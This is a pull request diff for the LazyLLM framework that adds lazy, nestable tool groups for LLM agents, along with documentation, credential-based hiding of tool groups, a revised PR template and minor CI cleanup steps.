### PR TITLE
Add tool groups for progressive tool selection.

### DIFF
--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -79,7 +79,7 @@
 ---
 
 
-# 🧠 AI 参与情况 / AI Involvement
+# 🧠 AI 参与情况 / AI Involvement (需查看近期所有的对话历史填写)
 
 <!-- 本 PR 是否使用 AI 工具 / Whether AI tools were used in this PR -->
 - [ ] 未使用 AI / No AI used
@@ -100,81 +100,12 @@
 ```text
 ```
 
-## AI 初始输出质量 / Initial Output Quality
+## 一开始制定了什么方案
 
-* [ ] 一次正确 / Correct on first try
-* [ ] 部分正确 / Partially correct
-* [ ] 基本不可用 / Mostly unusable
+## 方案实施后存在什么问题
 
-## **问题点 / Issues：**
+## 我（用户）发现了哪些问题
 
-## 🔧 人工干预过程 / Human Intervention
+## 对这些问题优化后相比于之前有哪些优势
 
-<!-- 重点：这是核心 / Key section: this is the core -->
-
-### 第一次修正 / First Correction
-
-**修改后的 Prompt / 操作 / Updated Prompt or Action：**
-
-```text
-```
-
-### **原因 / Reason：**
-
-### 第二次修正（如有）/ Second Correction (if any)
-
-**修改后的 Prompt / 操作 / Updated Prompt or Action：**
-
-```text
-```
-
-### **原因 / Reason：**
-
-### 最终策略总结 / Final Strategy Summary
-
-<!-- 这一步非常关键：沉淀经验 / This step is critical: capture learnings -->
-
-*
-
----
-
-# 📊 AI vs 人工贡献占比 / AI vs Human Contribution
-
-<!-- 粗略评估 / Rough estimate -->
-
-* AI 生成代码占比 / AI-generated code：`%`
-* 人工修改占比 / Human modifications：`%`
-
-**主要人工修改点 / Key Human Modifications：**
-
-* [ ] 逻辑修正 / Logic fixes
-* [ ] 边界处理 / Edge case handling
-* [ ] 性能优化 / Performance optimization
-* [ ] 代码风格 / Code style
-* [ ] 架构调整 / Architecture adjustments
-
----
-
-# ⚠️ AI 问题记录 / AI Failure Cases
-
-<!-- 失败案例非常有价值 / Failure cases are very valuable -->
-
-### ❌ 失败 Prompt 示例 / Failed Prompt Example
-
-```text
-```
-
-### ❌ 问题表现 / Issue Description
-
-*
-
-### ✅ 改进后 Prompt / Improved Prompt
-
-```text
-```
-
-# 🧩 可复用经验 / Reusable Patterns
-
-* Prompt 模板 / Prompt template：
-* 常见坑 / Common pitfalls：
-* 推荐做法 / Recommended practices：
+## 哪些可以沉淀为自己后续的编码规范

--- a/.github/scripts/check_stale_editable.py
+++ b/.github/scripts/check_stale_editable.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python3
-'''Check for stale _lazyllm_editable.pth files outside the venv that may redirect
-lazyllm imports to a wrong workspace.'''
+'''Check for stale editable install files outside the venv that may redirect
+lazyllm imports to a wrong workspace, and remove them automatically.'''
 import os
 import sys
 import glob
@@ -9,30 +9,39 @@ venv_dir = os.environ.get('VENV_DIR', '')
 workspace = os.environ.get('GITHUB_WORKSPACE', os.getcwd())
 stale = []
 
+# Patterns covering both legacy and modern editable install markers
+PTH_PATTERNS = ['_lazyllm_editable.pth', '__editable__.lazyllm*.pth', 'lazyllm.egg-link']
+
 for sp in sys.path:
     if not sp or not os.path.isdir(sp):
         continue
     if venv_dir and sp.startswith(venv_dir):
         continue
-    for pth in glob.glob(os.path.join(sp, '_lazyllm_editable.pth')):
-        with open(pth) as f:
-            for line in f:
-                line = line.strip()
-                if line and not line.startswith(('import', '#')):
-                    if os.path.isabs(line) and line != workspace:
-                        stale.append((pth, line))
-                    break
+    for pattern in PTH_PATTERNS:
+        for pth in glob.glob(os.path.join(sp, pattern)):
+            with open(pth) as f:
+                for line in f:
+                    line = line.strip()
+                    if line and not line.startswith(('import', '#')):
+                        if os.path.isabs(line) and line != workspace:
+                            stale.append((pth, line))
+                        break
 
 if stale:
     print()
     print('=' * 72)
-    print('!!! WARNING: Stale _lazyllm_editable.pth detected outside venv !!!')
-    print('!!! This may redirect lazyllm imports to a wrong workspace.   !!!')
-    print('!!! Delete the following files to fix:                       !!!')
+    print('WARNING: Stale editable install files detected outside venv.')
+    print('These may redirect lazyllm imports to a wrong workspace.')
+    print('Removing them now...')
     for pth, ws in stale:
-        print(f'!!!   rm {pth}')
-        print(f'!!!     (points to: {ws})')
+        print(f'  Removing: {pth}')
+        print(f'    (was pointing to: {ws})')
+        try:
+            os.remove(pth)
+            print(f'  Removed: {pth}')
+        except OSError as e:
+            print(f'  ERROR removing {pth}: {e}')
     print('=' * 72)
     print()
 else:
-    print('OK: no stale _lazyllm_editable.pth found outside venv')
+    print('OK: no stale editable install files found outside venv')

--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -870,6 +870,7 @@ jobs:
       - name: Checkout
         uses: actions/checkout@v4
         with:
+          ref: ${{ github.event.pull_request.head.sha }}  # Push event: Roll back to checkout target's HEAD.
           submodules: false
 
       - name: Setup

--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -193,6 +193,7 @@ jobs:
       - name: Install package in editable mode
         run: |
           set -e
+          python .github/scripts/check_stale_editable.py
           pip install -e .
 
       - name: RunTests

--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -887,7 +887,7 @@ jobs:
       - name: Download test dataset
         run: |
           set -euo pipefail
-          DATA_DIR="$GITHUB_WORKSPACE/.ci_data"
+          DATA_DIR="$GITHUB_WORKSPACE/ci_data"
           rm -rf "$DATA_DIR"
           export GIT_TERMINAL_PROMPT=0
           git config --global url."https://x-access-token:${GITHUB_TOKEN}@github.com/".insteadOf "https://github.com/"

--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -152,6 +152,7 @@ jobs:
         run: |
           set -e
           python .github/scripts/check_stale_editable.py
+          find . -type d -name __pycache__ -exec rm -rf {} + 2>/dev/null || true
           pip install -r requirements.txt
           pip install -r docs/requirements.txt
           LAZYLLM_INIT_DOC=True python -B docs/add_docstrings.py

--- a/docs/scripts/lazynote/editor/base.py
+++ b/docs/scripts/lazynote/editor/base.py
@@ -168,9 +168,11 @@ class BaseEditor(cst.CSTTransformer):
         new_docstring = self.gen_docstring(old_docstring, node_code)
 
         # Create a new docstring node if new_docstring is provided
-        new_docstring_node = (
-            cst.SimpleStatementLine([cst.Expr(cst.SimpleString(f'"""{new_docstring}"""'))]) if new_docstring else None
-        )
+        if new_docstring:
+            safe_docstring = new_docstring.replace('\\', '\\\\').replace('"""', '\\"\\"\\"')
+            new_docstring_node = cst.SimpleStatementLine([cst.Expr(cst.SimpleString(f'"""{safe_docstring}"""'))])
+        else:
+            new_docstring_node = None
 
         if new_docstring_node:
             # Check if the function body is a SimpleStatementSuite (single-line function)

--- a/docs/zh/Best Practice/functionCall.md
+++ b/docs/zh/Best Practice/functionCall.md
@@ -160,8 +160,8 @@ print(ret)
 
 1. 将 `gs` 包装为 `InstanceToolGroup`，遍历 `__public_apis__` 中的每个方法。
 2. 为 `lookup` 创建 `MethodModuleTool`，工具名为 `GoogleSearch_lookup`，并将 `gs.lookup` 作为绑定方法保存。
-3. 向 LLM 暴露的工具描述中只有 `GoogleSearch_lookup`，LLM 无需感知背后的实例。
-4. 执行时，`ToolManager` 通过 `_tool_call['GoogleSearch_lookup']` 找到 `InstanceToolGroup`，再取出 `MethodModuleTool`，最终调用 `gs.lookup(**kwargs)`。
+3. 向 LLM 暴露的工具描述中只有 `get_GoogleSearch_methods` gateway 工具（lazy 模式）；LLM 调用该工具后，`GoogleSearch_lookup` 的描述才动态注入 system prompt。
+4. 执行时，`ToolManager` 通过 `_tool_call['GoogleSearch_lookup']` 找到 `MethodModuleTool`，最终调用 `gs.lookup(**kwargs)`。
 
 如果一个实例的某些方法只在特定条件下可用（例如需要 API Key），可以在传入时附带 `key_source` 参数，`ToolManager` 会在生成工具描述时自动跳过未满足条件的实例：
 
@@ -169,6 +169,42 @@ print(ret)
 # 仅当环境变量 GOOGLE_API_KEY 存在时，才向 LLM 暴露 GoogleSearch 的工具
 agent = ReactAgent(llm, tools=[(gs, 'env.GOOGLE_API_KEY')])
 ```
+
+### 分层工具组（ToolGroup）
+
+当工具数量较多时，把所有工具描述一次性注入 system prompt 会显著增加上下文长度，影响模型性能。LazyLLM 提供了 **分层工具组** 机制，通过向 `tools` 列表传入 `dict` 来定义工具组：
+
+```python
+tools = [
+    tool1,
+    dict(name='search', desc='搜索工具集', tools=[search_web, search_news]),
+    dict(name='advanced', desc='高级工具', tools=[
+        tool2,
+        dict(name='sub_ops', desc='子工具集', tools=[tool3, tool4]),
+    ]),
+]
+agent = ReactAgent(llm, tools=tools)
+```
+
+`dict` 格式说明：
+
+- `name`（必填）：工具组名称，用于生成 gateway 工具名 `get_<name>_methods`。
+- `tools`（必填）：子工具列表，可以是函数、`ModuleTool`、或嵌套 `dict`。
+- `desc`（可选）：工具组描述，展示给 LLM 作为 gateway 工具的说明。
+- `lazy`（可选，默认 `True`）：是否使用 lazy 模式。
+
+**lazy 模式**（默认）的工作流程：
+
+1. 初始 system prompt 只包含 `get_search_methods` 这一个 gateway 工具，不展开子工具。
+2. LLM 判断需要搜索时，先调用 `get_search_methods()`，返回：
+   ```
+   Activated tool group "search". Available tools: search_web, search_news
+   ```
+3. 下一轮 LLM 调用时，system prompt 自动包含 `search_web` 和 `search_news` 的完整描述，LLM 直接选择并调用。
+
+**eager 模式**（`lazy=False`）：直接把所有子工具描述展开注入 system prompt，与普通工具注册行为一致。
+
+多级嵌套时，每一层都遵循相同规则——激活外层 gateway 后，内层子组的 gateway 工具才会出现在 system prompt 中，依此类推。
 
 如果我们不打算把工具注册为全局可见，也可以在调用 FunctionCall 的时候直接传入工具本身，像这样：
 

--- a/lazyllm/common/common.py
+++ b/lazyllm/common/common.py
@@ -352,7 +352,6 @@ def call_once(flag: once_flag, func: Callable, *args, **kw):
                 return r
             except Exception as e:
                 flag.set_exception(e)
-                flag.set()
                 raise
         if flag._exc:
             raise flag._exc

--- a/lazyllm/common/common.py
+++ b/lazyllm/common/common.py
@@ -352,6 +352,7 @@ def call_once(flag: once_flag, func: Callable, *args, **kw):
                 return r
             except Exception as e:
                 flag.set_exception(e)
+                flag.set()
                 raise
         if flag._exc:
             raise flag._exc

--- a/lazyllm/common/credential_mixin.py
+++ b/lazyllm/common/credential_mixin.py
@@ -15,6 +15,7 @@ from .auth import AuthStrategy, BearerTokenStrategy, Credential
 class CredentialMixin:
 
     _TOKEN_REFRESH_BUFFER: float = 60.0
+    def __key_source__(self) -> str: return self.get_current_token()
 
     def __init_credential__(
         self,

--- a/lazyllm/docs/tools/tool_agent.py
+++ b/lazyllm/docs/tools/tool_agent.py
@@ -2324,3 +2324,159 @@ This method is called automatically in ``ToolGroup.__init__`` when ``lazy=True``
 Returns:
     ModuleTool: The gateway tool instance representing the entry point of this tool group.
 ''')
+
+add_toolsmgr_chinese_doc('ToolContainer', '''\
+内部抽象基类，定义工具容器的统一接口。``ToolGroup`` 和 ``ToolGroupWrapper`` 均继承自该类。
+''')
+
+add_toolsmgr_english_doc('ToolContainer', '''\
+Internal abstract base class that defines the unified interface for tool containers.
+Both ``ToolGroup`` and ``ToolGroupWrapper`` inherit from this class.
+''')
+
+add_toolsmgr_chinese_doc('ToolContainer.get_flat_tools', '''\
+返回该容器内所有工具的扁平化字典，键为工具名称，值为对应的 ``ModuleTool`` 实例。
+
+Returns:
+    Dict[str, ModuleTool]: 工具名到工具实例的映射。
+''')
+
+add_toolsmgr_english_doc('ToolContainer.get_flat_tools', '''\
+Returns a flat dictionary of all tools in this container, keyed by tool name.
+
+Returns:
+    Dict[str, ModuleTool]: Mapping from tool name to ``ModuleTool`` instance.
+''')
+
+add_toolsmgr_chinese_doc('ToolContainer.get_description', '''\
+返回该容器内工具的描述列表，格式符合 OpenAI function calling schema。
+
+Args:
+    active_groups (Optional[Set[str]]): 当前已激活的工具组名称集合，用于 lazy 模式下决定是否展开子工具描述。
+
+Returns:
+    List[Dict]: 工具描述列表。
+''')
+
+add_toolsmgr_english_doc('ToolContainer.get_description', '''\
+Returns a list of tool descriptions conforming to the OpenAI function calling schema.
+
+Args:
+    active_groups (Optional[Set[str]]): Set of currently active group names, used in lazy mode to decide whether to expand child tool descriptions.
+
+Returns:
+    List[Dict]: List of tool description dicts.
+''')
+
+add_toolsmgr_chinese_doc('SkipMixin', '''\
+内部 Mixin 类，为工具组提供基于运行时凭据的跳过（skip）能力。
+
+``InstanceToolGroup`` 和 ``ToolGroupWrapper`` 均继承自该类。
+当 ``key_source`` 指定的凭据在运行时不可用时，``should_skip()`` 返回 ``True``，
+工具组的 ``get_description()`` 随即返回空列表，使该组对 LLM 不可见。
+''')
+
+add_toolsmgr_english_doc('SkipMixin', '''\
+Internal mixin class that provides runtime-credential-based skip capability for tool groups.
+
+Both ``InstanceToolGroup`` and ``ToolGroupWrapper`` inherit from this class.
+When the credential specified by ``key_source`` is unavailable at runtime, ``should_skip()`` returns ``True``
+and the tool group's ``get_description()`` returns an empty list, hiding the group from the LLM.
+''')
+
+add_toolsmgr_chinese_doc('SkipMixin.__init__', '''\
+初始化凭据来源。
+
+Args:
+    key_source (Union[str, Callable, List[Union[str, Callable]], None]): 运行时凭据来源。
+
+        - None（默认）：不检查凭据，工具始终可用。
+        - 字符串：``env.KEY``、``config.key``、``globals.config.key`` 或无 ``.`` 的裸键（等价于 ``globals.config.key``）。
+        - callable：接收 instance 作为参数，返回凭据字符串或空值。
+        - list：多个来源，任一非空即视为凭据可用（逻辑 OR）。
+''')
+
+add_toolsmgr_english_doc('SkipMixin.__init__', '''\
+Initialises the credential source.
+
+Args:
+    key_source (Union[str, Callable, List[Union[str, Callable]], None]): Runtime credential source.
+
+        - None (default): No credential check; tools are always available.
+        - String: ``env.KEY``, ``config.key``, ``globals.config.key``, or a bare key without a dot (equivalent to ``globals.config.key``).
+        - callable: Receives instance as argument and returns the credential string or an empty value.
+        - list: Multiple sources; tools are considered available if any source resolves to a non-empty value (logical OR).
+''')
+
+add_toolsmgr_chinese_doc('ToolGroupWrapper', '''\
+内部类，将任意工具或工具组包装为带凭据跳过能力的容器。
+
+当 ``(tool, key_source)`` 元组中的 ``tool`` 不带 ``__public_apis__``，或 ``dict`` 工具组指定了 ``key_source`` 时，
+框架会自动创建该对象。凭据不可用时，``get_description()`` 返回空列表，使内部工具对 LLM 不可见。
+
+Args:
+    tool (Any): 被包装的工具或工具组。
+    key_source (Union[str, Callable, List[Union[str, Callable]], None]): 运行时凭据来源，语义同 ``SkipMixin.__init__``。
+''')
+
+add_toolsmgr_english_doc('ToolGroupWrapper', '''\
+Internal class that wraps any tool or tool group with runtime-credential-based skip capability.
+
+Created automatically when the ``tool`` in a ``(tool, key_source)`` tuple does not have ``__public_apis__``,
+or when a ``dict`` tool group specifies a ``key_source`` field.
+When the credential is unavailable, ``get_description()`` returns an empty list, hiding the inner tools from the LLM.
+
+Args:
+    tool (Any): The tool or tool group to wrap.
+    key_source (Union[str, Callable, List[Union[str, Callable]], None]): Runtime credential source; same semantics as ``SkipMixin.__init__``.
+''')
+
+add_toolsmgr_chinese_doc('ToolGroupWrapper.__init__', '''\
+初始化包装器，绑定内部工具与凭据来源。
+
+Args:
+    tool (Any): 被包装的工具或工具组。
+    key_source (Union[str, Callable, List[Union[str, Callable]], None]): 运行时凭据来源，语义同 ``SkipMixin.__init__``。
+''')
+
+add_toolsmgr_english_doc('ToolGroupWrapper.__init__', '''\
+Initialises the wrapper, binding the inner tool and the credential source.
+
+Args:
+    tool (Any): The tool or tool group to wrap.
+    key_source (Union[str, Callable, List[Union[str, Callable]], None]): Runtime credential source; same semantics as ``SkipMixin.__init__``.
+''')
+
+add_toolsmgr_chinese_doc('ToolGroupWrapper.get_flat_tools', '''\
+返回内部工具容器的扁平化工具字典。
+
+Returns:
+    Dict[str, ModuleTool]: 工具名到工具实例的映射。
+''')
+
+add_toolsmgr_english_doc('ToolGroupWrapper.get_flat_tools', '''\
+Returns the flat tool dictionary from the inner tool container.
+
+Returns:
+    Dict[str, ModuleTool]: Mapping from tool name to ``ModuleTool`` instance.
+''')
+
+add_toolsmgr_chinese_doc('ToolGroupWrapper.get_description', '''\
+若凭据不可用则返回空列表；否则委托给内部工具或工具组返回其描述列表。
+
+Args:
+    active_groups (Optional[Set[str]]): 当前已激活的工具组名称集合。
+
+Returns:
+    List[Dict]: 工具描述列表，凭据不可用时为空列表。
+''')
+
+add_toolsmgr_english_doc('ToolGroupWrapper.get_description', '''\
+Returns an empty list when the credential is unavailable; otherwise delegates to the inner tool or tool group.
+
+Args:
+    active_groups (Optional[Set[str]]): Set of currently active group names.
+
+Returns:
+    List[Dict]: List of tool description dicts, or an empty list when the credential is absent.
+''')

--- a/lazyllm/docs/tools/tool_agent.py
+++ b/lazyllm/docs/tools/tool_agent.py
@@ -125,9 +125,11 @@ ToolManager是一个工具管理类，用于提供工具信息和工具调用给
 
 - 工具名字符串（已通过 ``fc_register`` 注册的工具）
 - 可调用对象（函数或 ``ModuleTool`` 实例）
-- 带有 ``__public_apis__`` 的对象实例（自动包装为 ``InstanceToolGroup``）
+- 带有 ``__public_apis__`` 的对象实例（自动包装为 ``InstanceToolGroup``）；
+  若该类继承自 ``CredentialMixin``，则自动以 ``get_current_token()`` 作为凭据来源，token 为空时该组工具对 LLM 不可见。
 - ``(instance, key_source)`` 元组（带凭据来源的实例工具组）
-- ``dict``：直接定义一个工具组，格式为 ``dict(name='grp', desc='...', tools=[...], lazy=True)``，其中 ``name`` 和 ``tools`` 为必填字段。
+- ``dict``：直接定义一个工具组，格式为 ``dict(name='grp', desc='...', tools=[...], lazy=True)``，其中 ``name`` 和 ``tools`` 为必填字段；
+  可选字段 ``key_source`` 用于绑定运行时凭据来源，语义与 ``(instance, key_source)`` 元组中的 ``key_source`` 相同，凭据不存在时整组工具对 LLM 不可见。
 
 工具组（``ToolGroup``）支持两种模式：
 
@@ -149,9 +151,13 @@ When constructing this management class, you pass in a list of tools. Each eleme
 
 - A tool name string (a tool registered via ``fc_register``)
 - A callable (plain function or ``ModuleTool`` instance)
-- An object instance with ``__public_apis__`` (automatically wrapped as ``InstanceToolGroup``)
+- An object instance with ``__public_apis__`` (automatically wrapped as ``InstanceToolGroup``).
+  If the class inherits from ``CredentialMixin``, ``get_current_token()`` is automatically used as the credential source;
+  when the token is empty the entire tool group is hidden from the LLM.
 - A ``(instance, key_source)`` tuple (instance tool group with a runtime credential source)
 - A ``dict``: defines a tool group inline, with the format ``dict(name='grp', desc='...', tools=[...], lazy=True)``. ``name`` and ``tools`` are required fields.
+  The optional ``key_source`` field binds a runtime credential source with the same semantics as the ``key_source`` in a ``(instance, key_source)`` tuple;
+  when the credential is absent the entire group is hidden from the LLM.
 
 Tool groups (``ToolGroup``) support two modes:
 
@@ -860,7 +866,8 @@ Args:
         - ``Callable``：直接传入函数，会被临时注册为工具。
         - ``ModuleTool`` 实例：直接使用已构造好的工具对象。
         - 带有 ``__public_apis__`` 的对象实例：直接传入，框架自动将 ``__public_apis__`` 中的每个方法展开为独立工具。
-          若该类定义了 ``__key_source__`` 字段，则自动用作凭据来源；否则工具始终可用。
+          若该类继承自 ``CredentialMixin``，则自动以 ``get_current_token()`` 作为凭据来源，token 为空时该组工具对 LLM 不可见；
+          否则若该类定义了 ``__key_source__`` 字段，则以其作为凭据来源；两者均未定义时工具始终可用。
         - ``(instance, key_source)`` 元组：将带有 ``__public_apis__`` 的对象实例注册为一组工具，并绑定运行时凭据来源。
           ``instance`` 需声明 ``__public_apis__: List[str]``，其中每个方法名都会被展开为一个独立工具。
           ``key_source`` 支持字符串（``'env.XXX'``、``'config.xxx'``、``'globals.config.xxx'``，无 ``.`` 时等价于 ``globals.config.xxx``）、
@@ -869,6 +876,7 @@ Args:
         - ``dict``：直接定义一个工具组，格式为 ``dict(name='grp', desc='描述', tools=[...], lazy=True)``。
           ``name`` 和 ``tools`` 为必填字段；``lazy=True``（默认）时初始只暴露 ``get_<name>_methods`` gateway 工具，
           LLM 调用后子工具描述动态注入 system prompt；``lazy=False`` 时直接展开所有子工具。
+          可选字段 ``key_source`` 用于绑定运行时凭据来源，语义与 ``(instance, key_source)`` 元组中的 ``key_source`` 相同，凭据不存在时整组工具对 LLM 不可见。
           支持多级嵌套，子 ``tools`` 列表中可以再嵌套 ``dict`` 工具组。
 
     max_retries (int): 工具调用循环的最大轮次，超出后若 `force_summarize=True` 则触发强制总结，否则抛出异常，默认为5
@@ -896,7 +904,8 @@ Args:
         - ``Callable``: A plain function passed directly; it is temporarily registered as a tool.
         - ``ModuleTool`` instance: A pre-constructed tool object used as-is.
         - Object instance with ``__public_apis__``: Passed directly; each method in ``__public_apis__`` is expanded into a separate tool automatically.
-          If the class defines a ``__key_source__`` attribute, it is used as the credential source; otherwise the tools are always available.
+          If the class inherits from ``CredentialMixin``, ``get_current_token()`` is automatically used as the credential source and the group is hidden when the token is empty.
+          Otherwise, if the class defines a ``__key_source__`` attribute, it is used as the credential source; if neither is defined the tools are always available.
         - ``(instance, key_source)`` tuple: Registers an object instance that declares ``__public_apis__: List[str]`` as a group of tools, with a runtime credential source attached.
           Each method listed in ``__public_apis__`` is expanded into a separate tool.
           ``key_source`` accepts a string (``'env.XXX'``, ``'config.xxx'``, ``'globals.config.xxx'``; no dot means ``globals.config.xxx``),
@@ -905,7 +914,10 @@ Args:
         - ``dict``: Defines a tool group inline, with the format ``dict(name='grp', desc='...', tools=[...], lazy=True)``.
           ``name`` and ``tools`` are required fields. When ``lazy=True`` (default), only a ``get_<name>_methods`` gateway tool is initially
           exposed; after the LLM calls it, child tool descriptions are dynamically injected into the system prompt. When ``lazy=False``,
-          all child tools are expanded immediately. Multi-level nesting is supported by embedding ``dict`` groups inside ``tools``.
+          all child tools are expanded immediately.
+          The optional ``key_source`` field binds a runtime credential source with the same semantics as in a ``(instance, key_source)`` tuple;
+          when the credential is absent the entire group is hidden from the LLM.
+          Multi-level nesting is supported by embedding ``dict`` groups inside ``tools``.
 
     max_retries (int): Maximum number of tool-call loop iterations. When exceeded, the force-summarize fallback is triggered (if enabled) or an exception is raised. Defaults to 5.
     return_trace (bool): Whether to return the full execution trace for debugging and analysis. Defaults to False.

--- a/lazyllm/docs/tools/tool_agent.py
+++ b/lazyllm/docs/tools/tool_agent.py
@@ -2241,3 +2241,74 @@ Args:
     method_name (str): The name of the method to wrap.
     key_source (Union[str, Callable, List[Union[str, Callable]], None]): Reserved parameter, currently unused. Defaults to None.
 ''')
+
+add_toolsmgr_chinese_doc('ToolGroup.get_flat_tools', '''\
+返回该工具组（及所有子工具组）中所有工具的扁平化字典，键为工具名，值为对应的 ``ModuleTool`` 实例。
+
+在 lazy 模式下，gateway 工具本身也会作为一个条目包含在结果中，以便 ``ToolManager`` 能够在收到 LLM 的 gateway 调用时正确路由。
+子工具组会被递归展开，最终结果中只包含叶子工具（``ModuleTool``）和各级 gateway 工具。
+
+Returns:
+    Dict[str, ModuleTool]: 工具名到 ``ModuleTool`` 实例的映射字典。
+''')
+
+add_toolsmgr_english_doc('ToolGroup.get_flat_tools', '''\
+Returns a flat dictionary of all tools in this group (and all nested sub-groups), mapping tool name to the corresponding ``ModuleTool`` instance.
+
+In lazy mode, the gateway tool itself is also included as an entry so that ``ToolManager`` can correctly route gateway calls from the LLM.
+Sub-groups are recursively expanded; the final result contains only leaf tools (``ModuleTool``) and gateway tools at each level.
+
+Returns:
+    Dict[str, ModuleTool]: A mapping from tool name to ``ModuleTool`` instance.
+''')
+
+add_toolsmgr_chinese_doc('ToolGroup.get_description', '''\
+返回当前工具组在给定激活状态下应向 LLM 暴露的工具描述列表（OpenAI function calling 格式）。
+
+- 若工具组处于 lazy 模式且尚未被激活（即 ``name`` 不在 ``active_groups`` 中），则只返回 gateway 工具的描述（一个元素的列表）。
+- 若工具组处于 eager 模式，或已被激活，则递归展开所有子工具的描述并返回。
+
+Args:
+    active_groups (Optional[Set[str]]): 当前已激活的工具组名称集合。为 ``None`` 时视为空集合（无任何组被激活）。
+
+Returns:
+    List[Dict]: 工具描述列表，每个元素符合 OpenAI function calling schema。
+''')
+
+add_toolsmgr_english_doc('ToolGroup.get_description', '''\
+Returns the list of tool descriptions (in OpenAI function calling format) that should be exposed to the LLM given the current activation state.
+
+- If the group is in lazy mode and has not yet been activated (i.e. ``name`` is not in ``active_groups``), only the gateway tool description is returned (a single-element list).
+- If the group is in eager mode, or has been activated, all child tool descriptions are recursively expanded and returned.
+
+Args:
+    active_groups (Optional[Set[str]]): The set of currently activated tool group names. Treated as an empty set when ``None`` (no groups activated).
+
+Returns:
+    List[Dict]: A list of tool descriptions, each conforming to the OpenAI function calling schema.
+''')
+
+add_toolsmgr_chinese_doc('ToolGroup.make_gateway_tool', '''\
+为该工具组创建并返回一个 gateway ``ModuleTool``。
+
+gateway 工具的名称为 ``get_<name>_methods``，调用时会将该工具组名称追加到当前 session 的 ``_active_groups`` 列表中，
+并返回一条提示字符串，告知 LLM 该组已激活以及可用的子工具名称列表。
+
+该方法在 ``ToolGroup.__init__`` 中自动调用（当 ``lazy=True`` 时），通常不需要手动调用。
+
+Returns:
+    ModuleTool: 代表该工具组入口的 gateway 工具实例。
+''')
+
+add_toolsmgr_english_doc('ToolGroup.make_gateway_tool', '''\
+Creates and returns a gateway ``ModuleTool`` for this tool group.
+
+The gateway tool is named ``get_<name>_methods``. When called, it appends the group name to the ``_active_groups``
+list in the current session workspace and returns a message string informing the LLM that the group has been
+activated along with the list of available child tool names.
+
+This method is called automatically in ``ToolGroup.__init__`` when ``lazy=True`` and does not normally need to be invoked manually.
+
+Returns:
+    ModuleTool: The gateway tool instance representing the entry point of this tool group.
+''')

--- a/lazyllm/docs/tools/tool_agent.py
+++ b/lazyllm/docs/tools/tool_agent.py
@@ -2160,25 +2160,25 @@ add_toolsmgr_example('ToolGroup', '''\
 >>> from lazyllm import init_session, locals as lazyllm_locals
 >>>
 >>> def search_web(query: str) -> str:
-...     """Search the web.
+...     \"\"\"Search the web.
 ...
 ...     Args:
 ...         query (str): Search query.
 ...
 ...     Returns:
 ...         str: Search results.
-...     """
+...     \"\"\"
 ...     return f"web results for {query}"
 ...
 >>> def search_news(query: str) -> str:
-...     """Search news articles.
+...     \"\"\"Search news articles.
 ...
 ...     Args:
 ...         query (str): News search query.
 ...
 ...     Returns:
 ...         str: News results.
-...     """
+...     \"\"\"
 ...     return f"news for {query}"
 ...
 >>> # Lazy mode (default): only gateway tool is visible initially
@@ -2207,7 +2207,7 @@ Activated tool group "search". Available tools: search_web, search_news
 >>>
 >>> # Multi-level nesting
 >>> def calc_add(a: str, b: str) -> str:
-...     """Add two numbers.
+...     \"\"\"Add two numbers.
 ...
 ...     Args:
 ...         a (str): First number.
@@ -2215,7 +2215,7 @@ Activated tool group "search". Available tools: search_web, search_news
 ...
 ...     Returns:
 ...         str: Sum.
-...     """
+...     \"\"\"
 ...     return str(int(a) + int(b))
 ...
 >>> tm3 = ToolManager([

--- a/lazyllm/docs/tools/tool_agent.py
+++ b/lazyllm/docs/tools/tool_agent.py
@@ -121,10 +121,23 @@ Args:
 add_chinese_doc('ToolManager', '''\
 ToolManager是一个工具管理类，用于提供工具信息和工具调用给function call。
 
-此管理类构造时需要传入工具名字符串列表。此处工具名可以是LazyLLM提供的，也可以是用户自定义的，如果是用户自定义的，首先需要注册进LazyLLM中才可以使用。在注册时直接使用 `fc_register` 注册器，该注册器已经建立 `tool` group，所以使用该工具管理类时，所有函数都统一注册进 `tool` 分组即可。待注册的函数需要对函数参数进行注解，并且需要对函数增加功能描述，以及参数类型和作用描述。以方便工具管理类能对函数解析传给LLM使用。
+此管理类构造时需要传入工具列表。工具可以是以下几种形式：
+
+- 工具名字符串（已通过 ``fc_register`` 注册的工具）
+- 可调用对象（函数或 ``ModuleTool`` 实例）
+- 带有 ``__public_apis__`` 的对象实例（自动包装为 ``InstanceToolGroup``）
+- ``(instance, key_source)`` 元组（带凭据来源的实例工具组）
+- ``dict``：直接定义一个工具组，格式为 ``dict(name='grp', desc='...', tools=[...], lazy=True)``，其中 ``name`` 和 ``tools`` 为必填字段。
+
+工具组（``ToolGroup``）支持两种模式：
+
+- **lazy 模式**（默认）：初始只向 LLM 暴露一个 ``get_<name>_methods`` 工具；LLM 调用该工具后，该组的子工具描述会动态注入 system prompt，LLM 在下一轮中再选择并调用具体工具。适合工具数量多、希望减少上下文长度的场景。
+- **eager 模式**（``lazy=False``）：直接把所有子工具描述展开注入 system prompt，与旧行为一致。
+
+工具组支持多级嵌套，子节点可以是普通工具或另一个工具组（通过嵌套 ``dict`` 定义）。
 
 Args:
-    tools (List[str]): 工具名称字符串列表。
+    tools (List): 工具列表，每个元素支持字符串、Callable、ModuleTool、带 ``__public_apis__`` 的实例、``(instance, key_source)`` 元组，或 ``dict`` 工具组。
     return_trace (bool): 是否返回中间步骤和工具调用信息。
     sandbox (LazyLLMSandboxBase | None): 沙箱实例。若提供，则当工具的 ``execute_in_sandbox`` 为 True 时，工具将在此沙箱中执行，并自动处理文件上传/下载。
 ''')
@@ -132,10 +145,23 @@ Args:
 add_english_doc('ToolManager', '''\
 ToolManager is a tool management class used to provide tool information and tool calls to function call.
 
-When constructing this management class, you need to pass in a list of tool name strings. The tool name here can be provided by LazyLLM or user-defined. If it is user-defined, it must first be registered in LazyLLM before it can be used. When registering, directly use the `fc_register` registrar, which has established the `tool` group, so when using the tool management class, all functions can be uniformly registered in the `tool` group. The function to be registered needs to annotate the function parameters, and add a functional description to the function, as well as the parameter type and function description. This is to facilitate the tool management class to parse the function and pass it to LLM for use.
+When constructing this management class, you pass in a list of tools. Each element can be one of the following:
+
+- A tool name string (a tool registered via ``fc_register``)
+- A callable (plain function or ``ModuleTool`` instance)
+- An object instance with ``__public_apis__`` (automatically wrapped as ``InstanceToolGroup``)
